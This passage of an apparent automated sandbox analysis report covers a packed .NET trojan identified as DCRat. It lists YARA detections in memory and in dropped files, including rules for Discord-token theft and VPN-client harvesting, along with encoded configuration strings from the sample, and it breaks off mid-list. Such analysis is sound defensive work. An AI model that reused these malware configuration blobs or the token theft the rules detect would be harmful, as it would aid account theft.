Source: 00000012.00000002.2097619560.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.000000000313B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.0000000003126000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000003.00000002.2031490283.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3532252741.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000012.00000002.2087235357.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Loaader.exe PID: 7280, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: WinDefend.exe.0.dr

Static PE information: Section: %q2hF6 ZLIB complexity 1.0006310096153845

Source: Client.exe.0.dr, Settings.cs	Base64 encoded string: 'wWFEfQ+c90ezzgzVIAh2gn+ioxYAJrGRMTFIxsXSw2YlYKJtM/w/sAkG4PPuKX68Q8Bhjb4R/TNUX88Q9SgO8A==', 'wzI1GS7Qfvo4LsaJi0uqhPvW3er4Q7/n8ss6PONCBS8DzdTXs13MEbSRSJgnXTKJ4iTd++8X/kvaEYndCP/aDA==', 'l6B7hF2xdr1rH7SsDfVoi7MFx7QNmsw3TCZcmQB+isQN4elZF1M0hAmMAEoIFa4cVajo68VCOJDHOBuppuCyyju1WyPfhgBKzN8SLrU61qzZtpILUoxyezPnWbOHqAtV', 'xO7d3fFj6FvLvDIgm7WHEh/cBt3+RxVRoytmJT6p5KptN8hzxoanZtN93I5FqmoFNrney7rUvpRtihOgggLNyA==', 'YWe4qbKlktMVJTOSC4FHgRtIKybnn6IbXRRN5zHOBjqpjbHhP6byE4I7cOaJNeV2YrW/id6gcpYIA2F7eFYRnQ==', 'JvuASB2x4/fyHMUb4XE9373BC5dopAMLZ3bdc7gtg4SCpRBFCmaDPMfE1BHRn+hUN5PQZoiawxNfrQ6MtujUmw==', 'lRQuFjZWrbU8ySWxffDkTrJbvbtMVZ0jLwNEldEi6b5vcEh8/vpwV+vPSoldFWh1hw36BlmUTobTwCBA9G6sfQ==', 'H8k0G7kh/HyAier3JjeeSR0fGh1kIazZBzSNceaI9eCpL2P+V9gNvOj+mLpDbN1eVysH9MSWzLQvfl7VQsXJ1Q==', '/i9VjP44DZ8IjbUQs7c/s8zNlC2hodfvhh2g484pObRIbDikM3SLRxuwt+bMCoxpI4znrsy2cFl9DCBset+TYA==', 'RG/1sRlcEjovL7lahmfV9QwhvWPdPd7GrxPbIa7GYhwuhOm2SAwzCdubNWXRMUHFdIiCHNhnlJRTFVH/IEwCzQ=='
Source: Infected.exe.0.dr, Settings.cs	Base64 encoded string: 'ZSgE7xBGnq+Rt7cUMppN8rA3lH8urzGV2xb7eNCY96Hy1eiWKwwCc7En6gKxqxZ/2PkDlCnX9m2S1lo2xiiB6g==', 'SLrGHEx3OzR+wFRYezLxjUljxsc4JCYeMgZjMnZjnWqe5yx1MwWp01MrYXCUV8+VABeRjwIV74mDU8GclCJ8LA==', 'H5uq8K24WQ59RPaMzoegXPlkFXxNghMbLC8Hyg05hZVlNFM4uLjuYknP/um7OEMV55QkaojJL6HYQYLL/+I1jYGiSFSu3TDJfcKS/wVmsnAQ1vAr7+PHnmtVbTedumXM', '/SSxvI9cCc6gajROWy9NsKWIQlIBncsZdwSCF4aW+gBzj90gnkQo8LljeceOKSHWEmc06qdGCMakK6DB5rySj8cGrJucrDAa2A4EKwFx2j0YlvvtoynHU3WZE84DAdgYtP5hdwTDjZvdgKXmOC6G2gN/pUlG16WpLry/EWADwiWgbDN3d5QnJOhXNjWOx+6nZB/sjkfWoOdEc/j1Cz7ARl1/HWMK97KFiTW67F+7icKK7XHlVC3B0yPoQtoC1b0ulBF9atG/QaNxm4/eSD2N85idPvPZRrIgv+9U0oJ3ADBgJDgI38HRy05GnGrV5NWiTHVtHtng5i7UM0SOze4lCy8Qc8SRRhBTpK/8e47g2uUYOtKbTFeGGUxTQauXcHsWheDZLBk3ivWvHxuQ4JYko3NF1Wc0BVSQpyXmjISoUIkHtsc+svnXS21jmLzGz8UmLMdZrA4kyd50+1XbD5I5Mmy5eFhD2GZ/LCx47keVdZXOA5XdlSGX74PFBKjfV0n1GAKhe/PszCnOCjxC0nVYMVHnAqsE8XT/mjAAwRqJebVPkf/LnFfhvZ2ZGiERCo/U1K1YMteALei0Kmpv2eEgAA+d3/T/6zaxQtEH78x98MHsTBTlrkQRZgj8sqnTl6cEoozQ7IXBomY/876LBkIbgIkJci/FYiTiymGX5qWGUnPBZk18OczUY1jxjHWYSHgbsrEzia6Ww6Ptk0H8pdtD2aQHjFftLMctKhrMauNsX8Kqfcf6KOepoiWfncp5N7oayOXOcxNTAm13mVpR0LUCV2UEantbia5foH79neZA3hLdNk+nqNgn1KXLuxuTVpk1UQN4NWbLRVqzrTiUZj9wN9aXtEDbNqCR7esntSeitBzBgd0L9UXhsk0F61hMHtmA3OXIMqc4n1k/qU4KBPK8YR9a70aXgEV2oeMhOSoYc9yoJTO5Yups9zc8GNLPch7O+doky84atZ05JhnNwpK8YBZoigPbs2tebxyoPuJHePypknfZluW+/6JppQd5lw3nSlXMEviRfto87fflHQFXFtJycWjW+daOJbQHpQ/MNNU=', 'MFMO9tQliu2ahQNaZ3lj7Wf/gRk36qwiOhN2bk2r9goaPIxtvEC1o1xa9OhDCoZCCE/4+3A1er0RXTmjAePWUZiEf716i9ToUYcgyacKNHZnW66p21ybPOob2s2T/B1gnGskdlt5cJpc6jvkp3q/n4JFQRTAesGDRmYu0dyKQ5LPWtBPg/nwm1hQS4zNXK68XGecNV7+oUc6hCHcm2WHB7ixI6S1Rdj8u5c2qquIz9djUVRdGJiEPqnH7aX6ExUEzVhapRSsIue2nifvQ0IfxvlQk9hkzcOQYmbLNZ7EGhs=', 'KSdmB55BOL3ztYhJamMxsl1GB/4EE/vUpYhY8ypiFZ88HhGtjV8JxQYFgyoQ+n8XhN6YFeWOGjHJN5CNponl9g==', 'jVed3LTMOC3Ruh7bMj8e1GRGwkKnPN3oTffGuEc34JGyNAsR2jJEVdUWw0Ib75wbyjKbEVcT+9D1G6Hr50kvyw==', 'pZ/npkec7blOVsRumN94nR0rBZcTDW4ACRirZXscCY48dX8vq9vXv+CBelTsvniWcpE064spGtxGNvGpM7YwHg=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Settings.cs	Base64 encoded string: 'wWFEfQ+c90ezzgzVIAh2gn+ioxYAJrGRMTFIxsXSw2YlYKJtM/w/sAkG4PPuKX68Q8Bhjb4R/TNUX88Q9SgO8A==', 'wzI1GS7Qfvo4LsaJi0uqhPvW3er4Q7/n8ss6PONCBS8DzdTXs13MEbSRSJgnXTKJ4iTd++8X/kvaEYndCP/aDA==', 'l6B7hF2xdr1rH7SsDfVoi7MFx7QNmsw3TCZcmQB+isQN4elZF1M0hAmMAEoIFa4cVajo68VCOJDHOBuppuCyyju1WyPfhgBKzN8SLrU61qzZtpILUoxyezPnWbOHqAtV', 'xO7d3fFj6FvLvDIgm7WHEh/cBt3+RxVRoytmJT6p5KptN8hzxoanZtN93I5FqmoFNrney7rUvpRtihOgggLNyA==', 'YWe4qbKlktMVJTOSC4FHgRtIKybnn6IbXRRN5zHOBjqpjbHhP6byE4I7cOaJNeV2YrW/id6gcpYIA2F7eFYRnQ==', 'JvuASB2x4/fyHMUb4XE9373BC5dopAMLZ3bdc7gtg4SCpRBFCmaDPMfE1BHRn+hUN5PQZoiawxNfrQ6MtujUmw==', 'lRQuFjZWrbU8ySWxffDkTrJbvbtMVZ0jLwNEldEi6b5vcEh8/vpwV+vPSoldFWh1hw36BlmUTobTwCBA9G6sfQ==', 'H8k0G7kh/HyAier3JjeeSR0fGh1kIazZBzSNceaI9eCpL2P+V9gNvOj+mLpDbN1eVysH9MSWzLQvfl7VQsXJ1Q==', '/i9VjP44DZ8IjbUQs7c/s8zNlC2hodfvhh2g484pObRIbDikM3SLRxuwt+bMCoxpI4znrsy2cFl9DCBset+TYA==', 'RG/1sRlcEjovL7lahmfV9QwhvWPdPd7GrxPbIa7GYhwuhOm2SAwzCdubNWXRMUHFdIiCHNhnlJRTFVH/IEwCzQ=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, Settings.cs	Base64 encoded string: 'ZSgE7xBGnq+Rt7cUMppN8rA3lH8urzGV2xb7eNCY96Hy1eiWKwwCc7En6gKxqxZ/2PkDlCnX9m2S1lo2xiiB6g==', 'SLrGHEx3OzR+wFRYezLxjUljxsc4JCYeMgZjMnZjnWqe5yx1MwWp01MrYXCUV8+VABeRjwIV74mDU8GclCJ8LA==', 'H5uq8K24WQ59RPaMzoegXPlkFXxNghMbLC8Hyg05hZVlNFM4uLjuYknP/um7OEMV55QkaojJL6HYQYLL/+I1jYGiSFSu3TDJfcKS/wVmsnAQ1vAr7+PHnmtVbTedumXM', '/SSxvI9cCc6gajROWy9NsKWIQlIBncsZdwSCF4aW+gBzj90gnkQo8LljeceOKSHWEmc06qdGCMakK6DB5rySj8cGrJucrDAa2A4EKwFx2j0YlvvtoynHU3WZE84DAdgYtP5hdwTDjZvdgKXmOC6G2gN/pUlG16WpLry/EWADwiWgbDN3d5QnJOhXNjWOx+6nZB/sjkfWoOdEc/j1Cz7ARl1/HWMK97KFiTW67F+7icKK7XHlVC3B0yPoQtoC1b0ulBF9atG/QaNxm4/eSD2N85idPvPZRrIgv+9U0oJ3ADBgJDgI38HRy05GnGrV5NWiTHVtHtng5i7UM0SOze4lCy8Qc8SRRhBTpK/8e47g2uUYOtKbTFeGGUxTQauXcHsWheDZLBk3ivWvHxuQ4JYko3NF1Wc0BVSQpyXmjISoUIkHtsc+svnXS21jmLzGz8UmLMdZrA4kyd50+1XbD5I5Mmy5eFhD2GZ/LCx47keVdZXOA5XdlSGX74PFBKjfV0n1GAKhe/PszCnOCjxC0nVYMVHnAqsE8XT/mjAAwRqJebVPkf/LnFfhvZ2ZGiERCo/U1K1YMteALei0Kmpv2eEgAA+d3/T/6zaxQtEH78x98MHsTBTlrkQRZgj8sqnTl6cEoozQ7IXBomY/876LBkIbgIkJci/FYiTiymGX5qWGUnPBZk18OczUY1jxjHWYSHgbsrEzia6Ww6Ptk0H8pdtD2aQHjFftLMctKhrMauNsX8Kqfcf6KOepoiWfncp5N7oayOXOcxNTAm13mVpR0LUCV2UEantbia5foH79neZA3hLdNk+nqNgn1KXLuxuTVpk1UQN4NWbLRVqzrTiUZj9wN9aXtEDbNqCR7esntSeitBzBgd0L9UXhsk0F61hMHtmA3OXIMqc4n1k/qU4KBPK8YR9a70aXgEV2oeMhOSoYc9yoJTO5Yups9zc8GNLPch7O+doky84atZ05JhnNwpK8YBZoigPbs2tebxyoPuJHePypknfZluW+/6JppQd5lw3nSlXMEviRfto87fflHQFXFtJycWjW+daOJbQHpQ/MNNU=', 'MFMO9tQliu2ahQNaZ3lj7Wf/gRk36qwiOhN2bk2r9goaPIxtvEC1o1xa9OhDCoZCCE/4+3A1er0RXTmjAePWUZiEf716i9ToUYcgyacKNHZnW66p21ybPOob2s2T/B1gnGskdlt5cJpc6jvkp3q/n4JFQRTAesGDRmYu0dyKQ5LPWtBPg/nwm1hQS4zNXK68XGecNV7+oUc6hCHcm2WHB7ixI6S1Rdj8u5c2qquIz9djUVRdGJiEPqnH7aX6ExUEzVhapRSsIue2nifvQ0IfxvlQk9hkzcOQYmbLNZ7EGhs=', 'KSdmB55BOL3ztYhJamMxsl1GB/4EE/vUpYhY8ypiFZ88HhGtjV8JxQYFgyoQ+n8XhN6YFeWOGjHJN5CNponl9g==', 'jVed3LTMOC3Ruh7bMj8e1GRGwkKnPN3oTffGuEc34JGyNAsR2jJEVdUWw0Ib75wbyjKbEVcT+9D1G6Hr50kvyw==', 'pZ/npkec7blOVsRumN94nR0rBZcTDW4ACRirZXscCY48dX8vq9vXv+CBelTsvniWcpE064spGtxGNvGpM7YwHg=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Settings.cs	Base64 encoded string: 'wWFEfQ+c90ezzgzVIAh2gn+ioxYAJrGRMTFIxsXSw2YlYKJtM/w/sAkG4PPuKX68Q8Bhjb4R/TNUX88Q9SgO8A==', 'wzI1GS7Qfvo4LsaJi0uqhPvW3er4Q7/n8ss6PONCBS8DzdTXs13MEbSRSJgnXTKJ4iTd++8X/kvaEYndCP/aDA==', 'l6B7hF2xdr1rH7SsDfVoi7MFx7QNmsw3TCZcmQB+isQN4elZF1M0hAmMAEoIFa4cVajo68VCOJDHOBuppuCyyju1WyPfhgBKzN8SLrU61qzZtpILUoxyezPnWbOHqAtV', 'xO7d3fFj6FvLvDIgm7WHEh/cBt3+RxVRoytmJT6p5KptN8hzxoanZtN93I5FqmoFNrney7rUvpRtihOgggLNyA==', 'YWe4qbKlktMVJTOSC4FHgRtIKybnn6IbXRRN5zHOBjqpjbHhP6byE4I7cOaJNeV2YrW/id6gcpYIA2F7eFYRnQ==', 'JvuASB2x4/fyHMUb4XE9373BC5dopAMLZ3bdc7gtg4SCpRBFCmaDPMfE1BHRn+hUN5PQZoiawxNfrQ6MtujUmw==', 'lRQuFjZWrbU8ySWxffDkTrJbvbtMVZ0jLwNEldEi6b5vcEh8/vpwV+vPSoldFWh1hw36BlmUTobTwCBA9G6sfQ==', 'H8k0G7kh/HyAier3JjeeSR0fGh1kIazZBzSNceaI9eCpL2P+V9gNvOj+mLpDbN1eVysH9MSWzLQvfl7VQsXJ1Q==', '/i9VjP44DZ8IjbUQs7c/s8zNlC2hodfvhh2g484pObRIbDikM3SLRxuwt+bMCoxpI4znrsy2cFl9DCBset+TYA==', 'RG/1sRlcEjovL7lahmfV9QwhvWPdPd7GrxPbIa7GYhwuhOm2SAwzCdubNWXRMUHFdIiCHNhnlJRTFVH/IEwCzQ=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, Settings.cs	Base64 encoded string: 'ZSgE7xBGnq+Rt7cUMppN8rA3lH8urzGV2xb7eNCY96Hy1eiWKwwCc7En6gKxqxZ/2PkDlCnX9m2S1lo2xiiB6g==', 'SLrGHEx3OzR+wFRYezLxjUljxsc4JCYeMgZjMnZjnWqe5yx1MwWp01MrYXCUV8+VABeRjwIV74mDU8GclCJ8LA==', 'H5uq8K24WQ59RPaMzoegXPlkFXxNghMbLC8Hyg05hZVlNFM4uLjuYknP/um7OEMV55QkaojJL6HYQYLL/+I1jYGiSFSu3TDJfcKS/wVmsnAQ1vAr7+PHnmtVbTedumXM', '/SSxvI9cCc6gajROWy9NsKWIQlIBncsZdwSCF4aW+gBzj90gnkQo8LljeceOKSHWEmc06qdGCMakK6DB5rySj8cGrJucrDAa2A4EKwFx2j0YlvvtoynHU3WZE84DAdgYtP5hdwTDjZvdgKXmOC6G2gN/pUlG16WpLry/EWADwiWgbDN3d5QnJOhXNjWOx+6nZB/sjkfWoOdEc/j1Cz7ARl1/HWMK97KFiTW67F+7icKK7XHlVC3B0yPoQtoC1b0ulBF9atG/QaNxm4/eSD2N85idPvPZRrIgv+9U0oJ3ADBgJDgI38HRy05GnGrV5NWiTHVtHtng5i7UM0SOze4lCy8Qc8SRRhBTpK/8e47g2uUYOtKbTFeGGUxTQauXcHsWheDZLBk3ivWvHxuQ4JYko3NF1Wc0BVSQpyXmjISoUIkHtsc+svnXS21jmLzGz8UmLMdZrA4kyd50+1XbD5I5Mmy5eFhD2GZ/LCx47keVdZXOA5XdlSGX74PFBKjfV0n1GAKhe/PszCnOCjxC0nVYMVHnAqsE8XT/mjAAwRqJebVPkf/LnFfhvZ2ZGiERCo/U1K1YMteALei0Kmpv2eEgAA+d3/T/6zaxQtEH78x98MHsTBTlrkQRZgj8sqnTl6cEoozQ7IXBomY/876LBkIbgIkJci/FYiTiymGX5qWGUnPBZk18OczUY1jxjHWYSHgbsrEzia6Ww6Ptk0H8pdtD2aQHjFftLMctKhrMauNsX8Kqfcf6KOepoiWfncp5N7oayOXOcxNTAm13mVpR0LUCV2UEantbia5foH79neZA3hLdNk+nqNgn1KXLuxuTVpk1UQN4NWbLRVqzrTiUZj9wN9aXtEDbNqCR7esntSeitBzBgd0L9UXhsk0F61hMHtmA3OXIMqc4n1k/qU4KBPK8YR9a70aXgEV2oeMhOSoYc9yoJTO5Yups9zc8GNLPch7O+doky84atZ05JhnNwpK8YBZoigPbs2tebxyoPuJHePypknfZluW+/6JppQd5lw3nSlXMEviRfto87fflHQFXFtJycWjW+daOJbQHpQ/MNNU=', 'MFMO9tQliu2ahQNaZ3lj7Wf/gRk36qwiOhN2bk2r9goaPIxtvEC1o1xa9OhDCoZCCE/4+3A1er0RXTmjAePWUZiEf716i9ToUYcgyacKNHZnW66p21ybPOob2s2T/B1gnGskdlt5cJpc6jvkp3q/n4JFQRTAesGDRmYu0dyKQ5LPWtBPg/nwm1hQS4zNXK68XGecNV7+oUc6hCHcm2WHB7ixI6S1Rdj8u5c2qquIz9djUVRdGJiEPqnH7aX6ExUEzVhapRSsIue2nifvQ0IfxvlQk9hkzcOQYmbLNZ7EGhs=', 'KSdmB55BOL3ztYhJamMxsl1GB/4EE/vUpYhY8ypiFZ88HhGtjV8JxQYFgyoQ+n8XhN6YFeWOGjHJN5CNponl9g==', 'jVed3LTMOC3Ruh7bMj8e1GRGwkKnPN3oTffGuEc34JGyNAsR2jJEVdUWw0Ib75wbyjKbEVcT+9D1G6Hr50kvyw==', 'pZ/npkec7blOVsRumN94nR0rBZcTDW4ACRirZXscCY48dX8vq9vXv+CBelTsvniWcpE064spGtxGNvGpM7YwHg=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, Settings.cs	Base64 encoded string: 'ZSgE7xBGnq+Rt7cUMppN8rA3lH8urzGV2xb7eNCY96Hy1eiWKwwCc7En6gKxqxZ/2PkDlCnX9m2S1lo2xiiB6g==', 'SLrGHEx3OzR+wFRYezLxjUljxsc4JCYeMgZjMnZjnWqe5yx1MwWp01MrYXCUV8+VABeRjwIV74mDU8GclCJ8LA==', 'H5uq8K24WQ59RPaMzoegXPlkFXxNghMbLC8Hyg05hZVlNFM4uLjuYknP/um7OEMV55QkaojJL6HYQYLL/+I1jYGiSFSu3TDJfcKS/wVmsnAQ1vAr7+PHnmtVbTedumXM', '/SSxvI9cCc6gajROWy9NsKWIQlIBncsZdwSCF4aW+gBzj90gnkQo8LljeceOKSHWEmc06qdGCMakK6DB5rySj8cGrJucrDAa2A4EKwFx2j0YlvvtoynHU3WZE84DAdgYtP5hdwTDjZvdgKXmOC6G2gN/pUlG16WpLry/EWADwiWgbDN3d5QnJOhXNjWOx+6nZB/sjkfWoOdEc/j1Cz7ARl1/HWMK97KFiTW67F+7icKK7XHlVC3B0yPoQtoC1b0ulBF9atG/QaNxm4/eSD2N85idPvPZRrIgv+9U0oJ3ADBgJDgI38HRy05GnGrV5NWiTHVtHtng5i7UM0SOze4lCy8Qc8SRRhBTpK/8e47g2uUYOtKbTFeGGUxTQauXcHsWheDZLBk3ivWvHxuQ4JYko3NF1Wc0BVSQpyXmjISoUIkHtsc+svnXS21jmLzGz8UmLMdZrA4kyd50+1XbD5I5Mmy5eFhD2GZ/LCx47keVdZXOA5XdlSGX74PFBKjfV0n1GAKhe/PszCnOCjxC0nVYMVHnAqsE8XT/mjAAwRqJebVPkf/LnFfhvZ2ZGiERCo/U1K1YMteALei0Kmpv2eEgAA+d3/T/6zaxQtEH78x98MHsTBTlrkQRZgj8sqnTl6cEoozQ7IXBomY/876LBkIbgIkJci/FYiTiymGX5qWGUnPBZk18OczUY1jxjHWYSHgbsrEzia6Ww6Ptk0H8pdtD2aQHjFftLMctKhrMauNsX8Kqfcf6KOepoiWfncp5N7oayOXOcxNTAm13mVpR0LUCV2UEantbia5foH79neZA3hLdNk+nqNgn1KXLuxuTVpk1UQN4NWbLRVqzrTiUZj9wN9aXtEDbNqCR7esntSeitBzBgd0L9UXhsk0F61hMHtmA3OXIMqc4n1k/qU4KBPK8YR9a70aXgEV2oeMhOSoYc9yoJTO5Yups9zc8GNLPch7O+doky84atZ05JhnNwpK8YBZoigPbs2tebxyoPuJHePypknfZluW+/6JppQd5lw3nSlXMEviRfto87fflHQFXFtJycWjW+daOJbQHpQ/MNNU=', 'MFMO9tQliu2ahQNaZ3lj7Wf/gRk36qwiOhN2bk2r9goaPIxtvEC1o1xa9OhDCoZCCE/4+3A1er0RXTmjAePWUZiEf716i9ToUYcgyacKNHZnW66p21ybPOob2s2T/B1gnGskdlt5cJpc6jvkp3q/n4JFQRTAesGDRmYu0dyKQ5LPWtBPg/nwm1hQS4zNXK68XGecNV7+oUc6hCHcm2WHB7ixI6S1Rdj8u5c2qquIz9djUVRdGJiEPqnH7aX6ExUEzVhapRSsIue2nifvQ0IfxvlQk9hkzcOQYmbLNZ7EGhs=', 'KSdmB55BOL3ztYhJamMxsl1GB/4EE/vUpYhY8ypiFZ88HhGtjV8JxQYFgyoQ+n8XhN6YFeWOGjHJN5CNponl9g==', 'jVed3LTMOC3Ruh7bMj8e1GRGwkKnPN3oTffGuEc34JGyNAsR2jJEVdUWw0Ib75wbyjKbEVcT+9D1G6Hr50kvyw==', 